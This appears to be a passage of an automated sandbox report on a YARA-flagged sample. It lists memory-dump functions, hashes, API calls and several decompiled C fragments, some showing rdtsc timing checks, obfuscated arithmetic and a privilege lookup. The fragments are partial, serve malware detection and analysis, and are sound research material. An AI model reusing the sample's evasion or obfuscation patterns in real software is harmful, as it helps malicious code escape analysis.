LdrInitializeThunk.NTDLL ref: 008BFEAB

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 008BFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFEDB

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 008BFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFFBF

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088A0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088ab
0x004088b3
0x004088b5
0x004088ba
0x004088bf
0x004088d2
0x004088d7
0x004088e0
0x004088ec
0x004088ff
0x00408904
0x00408907
0x00408910
0x00408922
0x00408927
0x0040892c
0x00000000
0x00000000
0x0040892e
0x00408932
0x00000000
0x00000000
0x00408934
0x00000000
0x00408932
0x00408936
0x00408939
0x0040893f
0x00408941
0x0040894c
0x00408951
0x00408954
0x00408961
0x0040896c
0x0040896e
0x00408974
0x00408978
0x0040897b
0x0040897b
0x00408982
0x00408985
0x0040898a
0x00408997
0x004088c6
0x004088c6
0x004088c6

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00418447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Strings

hA, xrefs: 0041846C, 00418477

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: hA
API String ID: 1279760036-1221461045
Opcode ID: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ac
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041852D, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184B4, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t12;

				_push(0x3c);
				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
				_t9 = _v0;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t12;
			}

0x004184b4
0x004184bb
0x004184c3
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418497
0x0041849f
0x004184a2
0x004184a6
0x004184ab
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008D26F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 92ab74a402f6fc0fe54e24a9512e35b2584dce09bdd3cc91efd91901d68f6e48
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: D1F02220328049ABCB69EA188C51BAA33D5FBA4301F54C23AED49C7341D631DD408290

Uniqueness

Uniqueness Score: -1.00%

Function 008C10D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 008C0060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 008C01D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 008C010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 008C1148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 008BF8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 008BF938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 008C1930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
